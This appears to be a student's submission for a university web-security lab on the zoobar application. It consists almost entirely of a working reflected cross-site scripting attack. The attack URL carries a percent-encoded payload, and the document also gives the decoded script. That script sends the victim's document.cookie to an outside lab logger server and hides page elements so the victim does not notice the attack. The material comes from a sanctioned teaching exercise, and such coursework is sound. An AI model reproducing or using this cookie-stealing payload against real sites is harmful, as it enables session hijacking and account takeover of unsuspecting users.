Lab W 3.1
URL:
http://zoobar/users.php?user=" size=10>%3C%73%63%72%69%70%74%3E%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%22%74%65%73%74%31%22%29%3B%0A%20%20%20%20%20%20%76%6F%69%64%28%28%6E%65%77%20%49%6D%61%67%65%28%29%29%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%64%61%73%61%6B%2D%76%6D%2D%6C%61%62%2D%73%65%72%76%65%72%2E%65%65%63%73%2E%6B%74%68%2E%73%65%2F%6C%6F%67%67%65%72%2F%6C%6F%67%2E%70%68%70%3F%27%20%2B%20%27%74%6F%3D%67%72%75%70%70%39%34%27%20%2B%20%27%26%70%61%79%6C%6F%61%64%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%26%72%61%6E%64%6F%6D%3D%27%20%2B%20%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%29%3B%0A%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%22%74%65%73%74%32%22%29%3B%0A%20%20%20%20%20%20%77%69%6E%64%6F%77%2E%61%64%64%45%76%65%6E%74%4C%69%73%74%65%6E%65%72%28%22%6C%6F%61%64%22%2C%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%62%61%64%75%73%65%72%22%29%2E%73%74%79%6C%65%20%3D%20%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%22%3B%0A%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%7A%6F%6F%62%61%72%73%22%29%2E%73%74%79%6C%65%20%3D%20%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%22%3B%0A%20%20%20%20%7D%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%69%6D%67%20%73%72%63%3D%22%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65

Script:

<script>console.log("test1");
      void((new Image()).src='http://dasak-vm-lab-server.eecs.kth.se/logger/log.php?' + 'to=grupp94' + '&payload='+document.cookie + '&random=' + Math.random());
      console.log("test2");
      window.addEventListener("load", function () {
      document.getElementById("baduser").style = "display:none;visibility:hidden;";
      document.getElementById("zoobars").style = "display:none;visibility:hidden;";
    });</script><img src="" style="display:none